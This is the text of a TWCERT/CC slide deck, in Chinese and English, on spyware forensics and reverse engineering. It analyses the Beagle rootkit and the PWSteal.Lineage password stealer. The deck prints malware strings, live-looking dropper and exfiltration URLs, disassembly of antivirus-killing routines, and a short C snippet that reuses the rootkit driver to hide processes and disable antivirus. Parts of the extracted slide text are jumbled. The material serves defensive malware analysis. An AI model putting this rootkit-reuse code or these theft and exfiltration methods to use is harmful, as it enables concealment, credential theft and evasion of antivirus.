Spyware Forensic With Reversing and Static Analysis PK TWCERT/CC

Spyware Forensic With Reversing and Static Analysis PK TWCERT/CC

Abstract 目 前 危 害 個 人 機 密 資 料 系 統 安 全 的 惡 意 程 式, 以 各 種 方 式 無 孔 不 入 的 進 入 我 們 電 腦, 當 我 們 上 網 下 載 程 式 接 收 電 子 郵 件 等, 往 往 會 遇 到 不 知 檔 案 是 否 為 惡 意 程 式, 但 防 毒 軟 體 也 未 出 現 警 告 的 情 況, 在 這 場 我 們 會 講 解 一 些 案 例 以 及 介 紹 靜 動 態 分 析 未 知 程 式 的 技 巧 About PK TWCERT/CC- 鑑 識 實 務 班 講 師 Mail: pk46(at)aptg.net 2

Outline Computer Forensics Why Spyware Forensics Reverse Code Engineering Anti-Reversing Spyware Reversing Conclusion 3

Computer Forensics What is Computer Forensics? Forensics Process Overview 4

Computer Forensics DEFINITION: 電 腦 鑑 識 是 一 種 運 用 專 業 的 分 析 與 調 查 技 術, 將 可 能 成 為 證 據 的 資 料 ( 又 稱 數 位 證 據 ) 進 行 收 集 鑑 別 分 析 與 保 存 的 一 個 過 程, 用 以 呈 現 於 法 院 狹 義 的 說 就 是 從 電 腦 安 全 事 件 發 生 後, 所 進 行 的 一 系 列 尋 找 數 位 證 據 的 活 動 數 位 證 據 為 任 何 可 能 的 資 訊, 並 能 夠 以 二 進 位 ( 數 位 ) 的 方 式 傳 輸 或 儲 存, 包 括 : 網 路 封 包 數 位 照 片 電 子 郵 件 記 憶 體 資 料 等 5

Forensics Process Overview Acquisition( 收 集 ) Live Data Collection (Volatile/Non- Volatile) Collecting Network-based Evidence Preservation( 保 存 ) Forensics Duplication Evidence Handling (Hash Tag) Identification( 鑑 定 ) Forensic Analysis Investigation Windows/Unix System Analyzing Network Traffic Evaluation( 評 估 ) Forensic Intuition/Sense Presentation( 呈 現 ) Writing Computer Forensic Report DFWS,2002 6

Why Spyware Forensics Rogue Web Sites Rogue Application Spyware Forensic 7

Rogue, Bad Guy http:// ://www.xgdown.com/ Rogue Web Sites 哪 裡 有 流 氓 網 站? 有 多 流 氓? 你 是 否 知 道 自 己 上 的 是 流 氓 網 站? Rogue Application 我 的 電 腦 怪 怪 的, 但 是 我 又 不 知 道 發 生 了 何 事? 而 我 的 防 毒 軟 體 也 並 沒 有 出 現 任 何 異 狀 或 警 訊! 電 腦 資 源 始 終 用 不 夠? 難 道 我 的 電 腦 有 怪 獸? 還 是 小 馬? http://www.zerodaycn.com 8

Spyware Forensics DEFINITION: Spyware Forensics 算 是 Computer Forensics 的 一 環, 主 要 針 對 一 些 未 知 檔 案 或 是 程 式 的 鑑 定 分 析, 當 我 們 進 行 一 些 電 腦 安 全 事 件 調 查 時, 如 :Hacking: Case,, 可 能 會 遇 到 駭 客 所 部 署 的 惡 意 程 式, 此 時 我 們 就 必 須 手 動 的 鑑 別 出 這 些 檔 案 並 對 其 分 析 的 過 程 稱 為 Spyware Forensics 或 稱 Malware Forensics Perform Static Analysis of Spyware Reviewing the ASCII and Unicode strings Disassembling Code Determining the Type of File PE/NE/ELF/COFF Perform Dynamic Analysis of Spyware Debugging Monitoring (Create the Sandbox Environment) Perform Online Research Determine if the tool is publicly available on computer security or hacker sites. Perform Source Code Review If you either have the source code or believe you have identified the source code via online research. 9

Reverse Code Engineering What is RCE Type Of RCE Reversing Tools 10

What is RCE Reverse engineering (RE) Reverse Engineering is the process of analyzing a subject system to create representations of the system at a higher level of abstraction. The process of discovering the technological principles of a mechanical application through analysis of its structure, function and operation. Reverse Code Engineering (RCE) RCE can be defined as analyzing and disassembling a software system in order understand its design, components, and innerworkings. RCE also allows us to see hidden behaviors that cannot be directly observed by running the program or those actions that have yet to be activated. 11

Types Of RCE Security-Related Reversing Malicious Software Reversing Cryptographic Algorithms Digital Rights Management Auditing Program Binaries Reversing in Software Development Achieving Interoperability with Proprietary Software Developing Competing Software Evaluating Software Quality and Robustness 12

Reversing Tools Hex Editors UltraEdit Hex Workshop WinHex Disassemblers IDA Pro W32DASM Decompilers DeDe DJ Decompiler Debuggers OllyDbg Soft-ICE System Monitors API Monitor FileMon RegMon PE Tools PEiD PEDitor LoadPE 13

Anti-Reversing Eliminating Symbolic Information Obfuscating the Program Embedding Anti-debugger Code Code Encryption 14

Anti-Reversing Eliminating Symbolic Information Clear Symbol Name Export Functions by Ordinals Obfuscating the Program Junk code Virtual Machine Embedding Anti-debugger Code isdebuggerpresent API CreateFIleA API Code Encryption Simple XOR/ADD Encryption Packer and Protector Packing Unpacking 15

Code Encryption Simple XOR/ADD Encryption A xor 0 =A A xor B =C A xor C =B Packer and Protector Win32 Packer ASPack PECompact UPX FSG Petite PE-PACK Win32 Protector: ASProtect ACProtect Armadillo EXECryptor EXE Stealth FoxLock Krypton telock SDProtector Themida VMProtect Xtreme-Protector ~Advantages~ 1) The physical file size is usually smaller. 2) Resistant to the cracker. 3) Resistant to pattern-based Anti-Virus program. 16

What is Packing ( 加 殼 )? Unpack stub Unpack stub When Execution Unpack stub Unpack stub When decompress ok jump to OEP PE File PE File packing PE File PE File PE Loader PE File PE File decompress PE File PE File Hard Disk Reducing Size Hard Disk Memory Increasing Size Memory 17

UnPacking ( 脫 殼 ) Automatic Unpacking Auto unpacking tools http://www.pediy.com/tools/unpacker.htm Manual Unpacking 1. Open Debugger and load PE File. 2. Trace program to find OEP (Original Entry Point) 1. OepFinder 2. ESP Principle 3. Manual Trace 3. Dump Process to disk 4. Rebuild IAT (Import Address Table) 5. Rebuild PE Demo 18

Spyware Reversing Spyware Reversing Methodology Case Study W32.Beagle.XX(NTRootKit-W) PWSteal.Lineage 19

Spyware Reversing Methodology (6 Step) Step 5 Decrypt String String Revealing the Source Code Algorithm Reconstruction Step 1 Step 2 Step 3 Step 4 String String Analysis PE PE Analysis Disassembling Debugging Step 6 Run&Monitoring Dos Stub Strange Keyword File Name Strange URL Strange IP Registry Key Strange E-MAIL Packer Check Unpacking API Name BindPEAnalysis Prog Mechanism Function xref String xfef Import Function Export Function Program Algorithm File Process Registry Network 20

Case Study W32.Beagle.XX(NTRootKit NTRootKit-W) Spyware Analysis Spyware Exploit PWSteal.Lineage Spyware Analysis Spyware Exploit 21

Case 1:W32.Beagle.XX( 1 W32.Beagle.XX(NTRootKit-W) 功 能 : 此 Rootkit 通 常 跟 隨 Beagle 病 毒 一 起 流 竄, 受 感 染 的 電 腦 會 去 指 定 的 網 站 (100 多 種 ) 下 載 副 檔 名 為.jpg 的 執 行 檔 ( 事 實 是 上 是 執 行 檔 ), 並 會 搜 集 感 染 電 腦 中 的 通 訊 錄 並 寄 發 Zip 過 的 惡 意 程 式 此 Spyware 具 有 SMTP 引 擎 能 夠 構 造 E-MAIL 格 式 主 動 發 信, 不 必 依 賴 SMTP Server, 直 接 用 被 感 染 電 腦 發 信 m_hook.sys 在 Kernel Mode, 具 抵 抗 防 毒 軟 體 能 力 態 樣 : 屬 不 請 自 來 型, 收 到 以 下 Mail 的 人 通 常 是 你 的 e-mail 已 經 被 獲 取 了 Received: from austin.net (59-120-60-217.hinet-ip.hinet.net [59.120.60.217]) 22

W32.Beagle.XX(NTRootKit NTRootKit-W) W)-Analysis Flow Spyware jrcdgmmjdol.exe Step Files Stage Stage 1 String Analysis PE File Analysis jrcdgmmjdol.exe Step 1 Step 2 Stage Stage 2 String Analysis PE File Analysis beagle_ext1.exe beagle_ext2.exe (Driver) Step 1 Step 2 Stage Stage 3 Disassembling beagle_ext1.exe beagle_ext2.exe (Driver) Step 3 23

W32.Beagle.XX-Static Analysis-Stage 1 Step 1: String analysis jrcdgmmjdol.exe DOS Stub:Not Found! Strange Keyword:Not Found! FileName:kernel32.dll Step 2: PE file analysis Packer Check:Not Found! API Name:LoadLibraryA GetProcAddress Unpacking:jrcdgmmjdol.exe->un_jrcdgmmjdol.exe BindPEAnalysis:Extract 2 PE Files (beagle_ext1.exe beagle_ext2.exe) Go To Stage 2 24

W32.Beagle.XX-Static Analysis-Stage HELO %s.net 2 HELO %s.org Step 1: String analysis beagle_ext1.exe RSET beagle_ext2.exe MAIL FROM:<%s> Beagle_ext1.exe RCPT TO:<%s> DOS Stub:Not Found! DATA.zip Strange Keyword: image/gif Date: %s FileName:temp.zip error.gif To: "%s" <%s> Strange IP:217.5.97.137 From: "%s" <%s> Subject: %s Strange URL: Message-ID: <%s%s> MIME-Version: 1.0 Beagle_ext2.exe DOS Stub:!This program cannot be run in Content-Type: DOS mode text/html; charset="us-ascii" Strange Keyword:\Device\m_hook \DosDevices\m_hook Content-Type: application/octet-stream; (IsDriver name="%s%s"?) KeServiceDescriptorTable Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="%s%s" FileName:c:\reliz\driver_rootkit2\driver\m_hook.pdb ntoskrnl.exe Step 2: PE file analysis Beagle_ext2.exe (Is Driver?) Packer Check:Not Found! <br>password - <img src="cid:%s.%s"><br> API Name:PsSetLoadImageNotifyRoutine ZwQueryInformationFile ZwQueryDirectoryFile ZwEnumerateKey ZwUnmapViewOfSection BindPEAnalysis:Not Found! Go To Stage 3 deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly drv_st_key \hidn \hidn1.exe m_hook.sys m_hook google.com HELO %s.com Content-Type: multipart/mixed; boundary="--------%s"----------%s Content-Transfer-Encoding: 7bit----------%s http://www.titanmotors.com/images/1/eml.php http://veranmaisala.com/1/eml.php http://wklight.nazwa.pl/1/eml.php http://yongsan24.co.kr/1/eml.php http://accesible.cl/1/eml.php http://hotelesalba.com/1/eml.php http://amdlady.com/1/eml.php http://inca.dnetsolution.net/1/eml.php http://www.auraura.com/1/eml.php http://avataresgratis.com/1/eml.php http://beyoglu.com.tr/1/eml.php http://brandshock.com/1/eml.php http://www.avinpharma.ru/777.gif http://ouarzazateservices.com/777.gif http://stats-adf.altadis.com/777.gif http://bartex-cit.com.pl/777.gif http://bazarbekr.sk/777.gif http://gnu.univ.gda.pl/777.gif http://bid-usa.com/777.gif http://biliskov.com/777.gif http://biomedpel.cz/777.gif http://blackbull.cz/777.gif <br>the password is <img src="cid:%s.%s"><br> <br>password -- <img src="cid:%s.%s"><br> <br>use password <img src="cid:%s.%s"> to open archive.<br> <br>password is <img src="cid:%s.%s"><br> <br>zip password: <img src="cid:%s.%s"><br> <br>archive password: <img src="cid:%s.%s"><br> <br>password: <img src="cid:%s.%s"><br>----------%s Content-Type: %s; name="%s.%s" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="%s.%s" Content-ID: <%s.%s> <img src="cid:%s.%s"><br>----------%s-- <br> <html><body> </body></html> 25

W32.Beagle.XX-Static Analysis-Stage 3 Step 3:Disassembling 3 - beagle_ext1.exe 26

W32.Beagle.XX-Static Analysis-Stage 3(Count.) Step 3:Disassembling 3 - beagle_ext1.exe (Startup Driver) 27

W32.Beagle.XX-Exploit Spyware Reuse Rootkit: //SSDT Hook #define IOCTL_M_HOOK_1 \ CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800, METHOD_BUFFERED, FILE_READ_ACCESS+FILE_WRITE_ACCESS) ACCESS+FILE_WRITE_ACCESS) //Hidden Process #define IOCTL_M_HOOK_2 \ CTL_CODE(FILE_DEVICE_UNKNOWN, 0x802, METHOD_BUFFERED, FILE_READ_ACCESS+FILE_WRITE_ACCESS) ACCESS+FILE_WRITE_ACCESS) //Hidden Directory #define IOCTL_M_HOOK_3 \ CTL_CODE(FILE_DEVICE_UNKNOWN, 0x803, METHOD_BUFFERED, FILE_READ_ACCESS+FILE_WRITE_ACCESS) ACCESS+FILE_WRITE_ACCESS) //Registry #define IOCTL_M_HOOK_5 \ CTL_CODE(FILE_DEVICE_UNKNOWN, 0x805, METHOD_BUFFERED, FILE_READ_ACCESS+FILE_WRITE_ACCESS) ACCESS+FILE_WRITE_ACCESS) char *tmp* tmp[]={" []={"notepad.exe","regedit.exe","calc.exe","hit2006","cmd.exe","nod32krn.exe","kav.exe"}; // File Process Registry DeviceIoControl(hFile,IOCTL_M_HOOK_2,tmp[2], sizeof(tmp),null,0,&bytesreturned,null);// &BytesReturned,NULL);//process DeviceIoControl(hFile,IOCTL_M_HOOK_3,tmp[0], sizeof(tmp),null,0,&bytesreturned,null);// &BytesReturned,NULL);//directorydirectory DeviceIoControl(hFile,IOCTL_M_HOOK_5,szWideProgID, sizeof(szwideprogid),null,0,&bytesreturned,null) //registry DeviceIoControl(hFile,IOCTL_M_HOOK_7,tmp[5], sizeof(tmp),null,0,&bytesreturned,null);//anti &BytesReturned,NULL);//anti-virus prog DeviceIoControl(hFile,IOCTL_M_HOOK_1,NULL,0,NULL,0,&BytesReturned,NULL); DEMO 28

Case 2:PWSteal.Lineage2 功 能 : 紀 錄 使 用 者 IE 連 線 與 線 上 遊 戲 帳 號 及 密 碼, 並 傳 送 到 指 定 的 E-mail 態 樣 : 多 從 即 時 通 訊 軟 體 發 送 類 似 如 下 的 訊 息 : 未 來 的 人 類 生 活, 是 甚 麼 模 樣? 日 本 東 京 科 學 博 物 館, 就 把 將 在 未 來 幾 10 年 內, 走 進 人 類 生 活 的 科 技, 做 了 完 整 展 示 http://kaixin.w67a.chinanetidc.com/x-box.scr 好 久 沒 上 線 拉, 最 近 還 好 嗎? 一 上 線 就 看 見 到 這 個 http://kaixin.w67a.chinanetidc.com/diany.scr 是 你 發 的 嗎? 粉 好 耶! 謝 謝 喔! 29

Spyware PWSteal.Lineage-Analysis Flow diany.scr Stage Stage 1 Step String Analysis PE File Analysis Files diany.scr Step 1 Step 2 Stage 2 String Analysis PE File Analysis Lineage_ext1.exe Lineage_ext2.exe Step 1 Step 2 Stage Stage 3 String Analysis PE File Analysis Lineage_Unext2.exe Lineage_ext3.exe Step 1 Step 2 Stage Stage 4 Disassembling diany.scr Step 3 Stage Stage 5 Debugging Lineage_Unext2.exe Step 4 Stage Stage 6 Decrypt String String Analysis Lineage_Unext2.exe Lineage_ext3.exe Step 5 Step 1 Stage Stage 7 Run&Monitoring diany.scr Step 6 30

PWSteal.Lineage-Static Static Analysis-Stage 1 Step 1: String analysis diany.scr DOS Stub:MZ This program must be run under Win32 Strange Keyword:EXEpack Adobe Photoshop 7.0(2006:05:08 14:01:31) FileName:1.exe ttt.jpg Step 2: PE file analysis Packer Check:Borland Delphi 6.0-7.0 [Overlay] API Name:WriteFile ReadFIle ShellExecuteA CreateProcessA BindPEAnalysis:Extract 2 PE Files (Lineage_ext1.exe Lineage_ext2.exe) Go To Stage 2 31

PWSteal.Lineage-Static Static Analysis-Stage 2 Step 1: String analysis Lineage_e Lineage_ext1.exe Lineage_ext2.exe DOS Stub: Lineage_ext1.exe:MZP This program must be run under Win32 Strange Keyword: Lineage_ext1.exe:SOFTWARE\Borland\Delphi\RTL EXEpack Lineage_ext2.exe:ByDwing FileName: Lineage_ext1.exe:.jpg.bmp.EXE Step 2: PE file analysis Packer Check: Lineage_ext1.exe:Borland Delphi 6.0-7.0 Lineage_ext2.exe:Upack 2.4-2.9 beta -> Dwing Unpacking:Lineage_ext2.exe -> Lineage_Unext2.exe BindPEAnalysis:Lineage_Unext2.exe Extract 1 File (Lineage_ext3.exe) Go To Stage 3 32

PWSteal.Lineage-Static Static Analysis-Stage 3 Step 1: String analysis Lineage_ext3.exe 127.0.0.1 sendemail sendemail-connect ehlo vip Lineage_ext3.exe :This program must be run under Win32 Rset MAIL FROM: RCPT TO: < Lineage_ext3.exe:tbMainAccountID tbmainaccountpassword DATA tbpasswordhint tbgoodlockid Message-Id: <HAgljnibgrft@b.b.c> From: To: Lineage_ext3.exe:J_.EXE d1.dat d2_.exe PDLL.dll Subject: X-Mailer: <FOXMAIL 4.0> MIME-Version: 1.0 Content-Type: text/html; charset="gb2312" QUIT HELO auth LOGIN MAIL FROM: RCPT TO: < Lineage_Unext2.exe:CreateToolhelp32Snapshot Process32First Process32Next DATA Message-Id: <HAnibgrft@b.b.c> Lineage_ext3.exe:SetWindowsHookExA UnhookWindowsHookEx From: Lineage_ext3.exe:2 Export Function->JSta JStb To: (IsDll?) Subject: X-Mailer: <FOXMAIL 4.0> MIME-Version: 1.0 Content-Type: text/html; charset="gb2312" 33 QUIT DOS Stub: Strange Keyword: FileName: Step 2: PE file analysis Packer Check: Lineage_ext3.exe:Not a valid PE file (Why?) API Name: BindPEAnalysis:None Go To Stage 4

CODE:00403FAE mov PWSteal.Lineage-Static Static CODE:00403FB3 Analysis-Stage mov 4 Step 3:Disassembling 3 -diany.scr diany.src is a Dropper CODE:00403E39 mov ecx, 2 ; dwmovemethod CODE:00403E3E mov edx, 0FFFFF6B4h ; ldistancetomove CODE:00403E43 mov eax, [ebp+hfile] ; hfile CODE:00403E46 call FileSeek(int,int,int) CODE:00403E4B lea edx, [ebp+var_896c] ; lpbuffer CODE:00403E51 mov ecx, 94Ch ; nnumberofbytestoread CODE:00403E56 mov eax, [ebp+hfile] ; hfile CODE:00403E59 call sub_403c6c CODE:00403E5E cmp eax, 94Ch CODE:00403E63 jnz loc_40421c CODE:00403E69 lea eax, [ebp+var_896c] CODE:00403E6F mov edx, offset aexepack ; "EXEpack" CODE:00403E74 xor ecx, ecx CODE:00403E76 mov cl, [eax] CODE:00403E78 inc ecx CODE:00403E79 call AStrCmp(void).. ttt.jpg. Open: Open: ttt.jpg ttt.jpg. CODE:00404136 push eax ; lpfile CODE:00404137 push offset @Consts@_16386 ; lpoperation CODE:0040413C Open: Open: 1.exe 1.exepush 0 ; hwnd CODE:0040413E call ShellExecuteA CODE:00403FA6 loc_403fa6: CODE:00403FA6 mov eax, [ebp+var_1c] CODE:00403FA9 mov eax, [eax] CODE:00403FAB sub [ebp+ldistancetomove], eax ecx, 2 ; dwmovemethod edx, [ebp+ldistancetomove] CODE:00403FB6 mov eax, [ebp+hfile] ; hfile CODE:00403FB9 call FileSeek(int,int,int) CODE:00403FBE lea eax, [ebp+var_8988] CODE:00403FC4 mov edx, [ebp+var_20] CODE:00403FC7 call unknown_libname_11 ; Dropping CODE:00403FCC ttt.jpgmov ecx, [ebp+var_8988] CODE:00403FD2 lea eax, [ebp+var_8984] CODE:00403FD8 mov edx, [ebp+var_14] CODE:00403FDB call LStrCat3(void) CODE:00403FE0 mov eax, [ebp+var_8984] CODE:00403FE6 call FileCreate(System::AnsiString) CODE:00403FEB mov [ebp+hobject], eax CODE:00403FEE cmp [ebp+hobject], 0FFFFFFFFh CODE:00403FF2 jz short loc_404060 CODE:00403FF4 xor edx, edx CODE:00403FF6 push ebp CODE:00403FF7 push offset loc_40404e Dropping Dropping 1.exe 1.exe CODE:00403FFC push dword ptr fs:[edx] CODE:00403FFF mov fs:[edx], esp CODE:00404002 CODE:00404002 loc_404002: CODE:00404002 mov eax, [ebp+var_1c] Dropping ttt.jpg CODE:00404005 mov eax, [eax] CODE:00404007 mov edx, 8000h CODE:0040400C call sub_404368 CODE:00404011 mov ecx, eax ; nnumberofbytestoread CODE:00404013 lea edx, [ebp+buffer] ; lpbuffer CODE:00404019 mov eax, [ebp+hfile] ; hfile CODE:0040401C call sub_403c6c CODE:00404021 mov ebx, eax CODE:00404023 mov eax, [ebp+var_1c] CODE:00404026 sub [eax], ebx CODE:00404028 lea edx, [ebp+buffer] ; lpbuffer CODE:0040402E mov ecx, ebx ; nnumberofbytestowrite CODE:00404030 mov eax, [ebp+hobject] ; hfile CODE:00404033 call sub_403c38 CODE:00404038 test ebx, ebx CODE:0040403A jz short loc_404044 CODE:0040403C mov eax, [ebp+var_1c] CODE:0040403F cmp dword ptr [eax], 0 CODE:00404042 jnz short loc_404002 34

PWSteal.Lineage-Dynamic Analysis-Stage 5 Step 4:Debugging 4 Lineage_ Lineage_UnExt2.exe Decrypt Decrypt Routine Routine 0040433D > /8B45 FC /mov eax, [ebp-4] 00404340. 8B55 F8 mov edx, [ebp-8] 00404343. 8A5C10 FF mov bl, [eax+edx-1] 00404347. 80C3 80 add bl, 80 0040434A. 8D45 F4 lea eax, [ebp-c] 0040434D. 8BD3 mov edx, ebx 0040434F. E8 84EEFFFF call 004031D8 00404354. 8B55 F4 mov edx, [ebp-c] 00404357. 8BC7 mov eax, edi 00404359. E8 DAEEFFFF call 00403238 0040435E. FF45 F8 inc dword ptr [ebp-8] 00404361. 4E dec esi 00404362.^\75 D9 \jnz short 0040433D RavMonClass RavMon.exe EGHOST.EXE MAILMON.EXE KAVPFW.EXE IPARMOR.EXE Ravmond.EXE KVXP.KXP KVMonXP.KXP KRegEx.exe 江 民 殺 毒 Decrypted Decrypted Strings Strings Close Close Prog ProgWindow Enum EnumAnti-Virus 00404B5D. 50 push eax ; /ProcessId 00404B5E. 6A FF push -1 ; Inheritable = TRUE 00404B60. 6A 01 push 1 ; Access = TERMINATE 00404B62. E8 6DEFFFFF call <jmp.&kernel32.openprocess> 00404B67. 8BD8 mov ebx, eax 00404B69. 85DB test ebx, ebx 00404B6B. 74 19 je short 00404B86 00404B6D. 6A 00 push 0 ; /ExitCode = 0 00404B6F. 53 push ebx ; hprocess 00404B70. E8 77EFFFFF call <jmp.&kernel32.terminateprocess> 00404B75. 83F8 01 cmp eax, 1 00404B78. 1BC0 sbb eax, eax 00404B7A. 40 inc eax 00404B7B. 8845 FB mov [ebp-5], al 00404B7E. 53 push ebx ; /hobject 00404B7F. E8 60EEFFFF call <jmp.&kernel32.closehandle> 00404C5E. 50 push eax ; Class 00404C5F. E8 A8EEFFFF call <jmp.&user32.findwindowa> 00404C64. 6A 00 push 0 ; /lparam = 0 00404C66. 6A 00 push 0 ; wparam = 0 00404C68. 6A 10 push 10 ; Message = WM_CLOSE 00404C6A. 50 push eax ; hwnd 00404C6B. E8 ACEEFFFF call <jmp.&user32.sendmessagea> 35

PWSteal.Lineage-Static Static Analysis-Stage 5(Count.) 00404260. C645 DF 4D mov byte ptr [ebp-21], 4D 00405B36. 50 push eax ; /FileName 00404264 Dropping. 6A PDLL.Dll 00 push 0 ; /poverlapped = NULL 00405B37. E8 70DFFFFF call <jmp.&kernel32.loadlibrarya> 00404266 Dropping. 8D45 PDLL.Dll E0 lea eax, [ebp-20] 00405B3C. 8BD8 mov ebx, eax 00404269. 50 push eax ; pbyteswritten 00405B3E Loading 85DB PDLL.Dll test ebx, ebx 0040426A. 6A 01 push 1 ; nbytestowrite = 100405B40. 0F84 A5010000 je 00405CEB 0040426C. 8D45 DF lea eax, [ebp-21] 00405B46. 8D95 C0F7FFFF lea edx, [ebp-840] 0040426F. 50 push eax ; Buffer 00405B4C. B8 48624000 mov eax, 00406248 00404270. 53 push ebx ; hfile 00405B51. E8 A2E7FFFF call 004042F8 00404271. E8 7EF8FFFF call <jmp.&kernel32.writefile> 00405B56. 8B85 C0F7FFFF mov eax, [ebp-840] 00404276. 6A 00 push 0 ; /poverlapped = NULL 00405B5C. E8 CFD8FFFF call 00403430 00404278. 8D45 E0 lea eax, [ebp-20] 00405B61. 50 push eax ; /ProcNameOrOrdinal 0040427B. 50 push eax ; pbyteswritten 00405B62. 53 push ebx ; hmodule 0040427C. 8B45 F8 mov eax, [ebp-8] 00405B63. E8 1CDFFFFF call <jmp.&kernel32.getprocaddres 0040427F. 48 dec eax 00404280. 50 push eax ; nbytestowrite 00405C41. 50 push eax 00404281. 8B45 FC mov eax, [ebp-4] 00405C42. FFD7 call edi // Call Export Function 00404284. 40 inc eax ; UnExt3.0040D1AC 00404285. 50 push eax ; Buffer 00404286. 53 push ebx ; hfile 00405C58 > /8B06 mov eax, [esi] 00404287. E8 68F8FFFF call <jmp.&kernel32.writefile> Kill Kill Process Process Loop Loop 0040428C. EB 14 jmp short 004042A2 00405C72. E8 9DDEFFFF call <jmp.&user32.peekmessagea> 0040428E > 6A 00 push 0 ; /poverlapped = NULL.. 00404290. 8D45 E0 lea eax, [ebp-20] 00405C8B. E8 94DEFFFF call <jmp.&user32.translatemessage> 00404293. 50 push eax ; pbyteswritten 00405C90. 8D85 D3FBFFFF lea eax, [ebp-42d] 00404294. 8B45 F8 mov eax, [ebp-8] 00405C96. 50 push eax ; /pmsg 00404297. 50 push eax ; nbytestowrite 00405C97. E8 68DEFFFF call <jmp.&user32.dispatchmessagea> 00404298. 8B45 FC mov eax, [ebp-4] 00405C9C 68 E8030000 push 3E8 ; /Timeout = 1000. ms 0040429B. 50 push eax ; Buffer 00405CA1. E8 3EDEFFFF call <jmp.&kernel32.sleep> 0040429C. 53 push ebx ; hfile 00405CA6. 8B06 mov eax, [esi] 0040429D. E8 52F8FFFF call <jmp.&kernel32.writefile> 00405CA8. FF80 19110000 inc dword ptr [eax+1119] 004042A2 > 53 push ebx ; /hobject 00405CAE. E8 65EFFFFF call 00404C18 //Kill Process Loop 36 004042A3. E8 3CF7FFFFcall <jmp.&kernel32.closehandle> 00405CB3. EB A3 jmp short 00405C58

PWSteal.Lineage-Static Static Analysis-Stage 6 Step 5:Decrypt 5 Strings Lineage_ Lineage_UnExt2.exe Decryption Routine buffer[i] = (buffer[i]+0x80) & 0xFF ; Extract Strings and GoTo Setp 1 Step 1: String Analysis-- --Lineage_ Lineage_UnExt2.exe Strange Keyword: RegisterServiceProcess Mapfile URLDownloadToFileA (API) FileName: RavMon.exe EGHOST.EXE MAILMON.EXE KAVPFW.EXE IPARMOR.EXE Ravmond.EXE KVXP.KXP KVMonXP.KXP KRegEx.exe PDLL.dll Internat.exe svchost.exe rundll32.exe URLMON.DLL wininit.ini Registry Key: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit URL: http://kaixin.w67a.chinanetidc.com/send.asp?tomail=abc@sina.com&mailbody= E-Mail:abc@sina.com 37

PWSteal.Lineage-Static Static Analysis-Stage 6(Count.) Step 5:Decrypt 5 Strings Lineage_ Lineage_Ext3.exe Decryption Routine buffer[i] = (buffer[i]+0x80) & 0xFF ; Extract Strings and GoTo Setp 1 Step 1: String analysis tbmainaccountid tbpersonalid tbmainaccountpassword tbserviceaccountid tboldpassword tbnewpassword lbservicetitle Strange Keyword: X_tbPassword FileName:c:\gameab1.txt c:\abc1. IEXPLORE.EXE wsock32.dll Registry Key: LiTo Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders ddldelaytime Internet Explorer_Server Lineage serverlistwnd Windows Client Strange URL: IEFrame http://gash.gamania.com/gash_loginform1.asp?message= socket http://www.gamania.com/ghome/home_center.asp connect https://tw.goodlock.gamania.com/index.aspx WSAStartup gethostname https://gash.gamania.com/gash_depositpoint/depositpoint_card.asp gethostbyname inet_ntoa WSACleanup https://tw.gash.gamania.com/gashlogin.aspx https://tw.gash.gamania.com/gashlogin.aspx? inet_addr https://tw.gash.gamania.com/updatemainaccountpassword.aspx send htons https://tw.gash.gamania.com/updatebasicinfo.aspx https://tw.gash.gamania.com/updateserviceaccountpassword.aspx closesocket recv Strange E-Mail:vip@microsoft.com 38

PWSteal.Lineage-Dynamic Analysis-Stage 7 Step 6:Run 6 & Monitoring (DEMO) svchost.exe svchost.exe 0 taskmgr.exe taskmgr.exe 0 Explorer.EXE Explorer.EXE 0 svchost.exe svchost.exe 0 taskmgr.exe taskmgr.exe 0 Explorer.EXE Explorer.EXE 0 https://tw.goodlock.gamania.com/index.aspx 5 6 U:ccc https://tw.goodlock.gamania.com/index.aspx 5 6 U:ccc https://tw.goodlock.gamania.com/index.aspx https://tw.goodlock.gamania.com/index.aspx Internet Explorer_Server Internet Explorer_Server https://tw.goodlock.gamania.com/index.aspx https://tw.goodlock.gamania.com/index.aspx39

Conclusion 網 路 上 充 斥 著 許 多 流 氓 網 站, 有 些 外 表 看 起 來 相 當 的 中 規 中 矩, 但 葫 蘆 裡 賣 假 藥, 行 釣 魚 之 實, 使 用 者 於 網 路 上 下 載 檔 案, 一 時 不 查, 都 有 可 能 吃 到 魚 鉤 目 前 間 諜 軟 體 流 行 檔 案 綑 綁 技 術, 一 個 檔 案 內 不 管 是 Office 檔 圖 片 檔 影 像 檔 等 都 有 可 能 搭 配 精 心 設 計 的 ShellCode 與 Spyware 一 同 放 置 於 一 個 檔 案 內, 這 時 我 們 必 須 需 學 習 些 分 析 技 術, 萃 取 出 相 關 檔 案 分 析, 因 為 光 靠 防 毒 軟 體 阻 擋 是 很 非 常 薄 弱 的 本 次 作 者 於 會 中 提 出 一 針 對 Spyware 的 逆 向 方 法 (6 Step),, 藉 由 這 個 流 程 實 際 的 分 析 了 兩 個 流 行 的 Spyware,, 並 根 據 所 找 尋 出 的 線 索 來 判 對 該 程 式 是 否 為 惡 意 程 式, 藉 以 證 明 其 適 用 性 希 望 能 夠 讓 與 會 的 朋 友 更 了 解 目 前 Spyware 的 手 法 及 方 式, 以 及 提 供 各 位 一 些 自 行 分 析 的 方 式 40

Thank You 41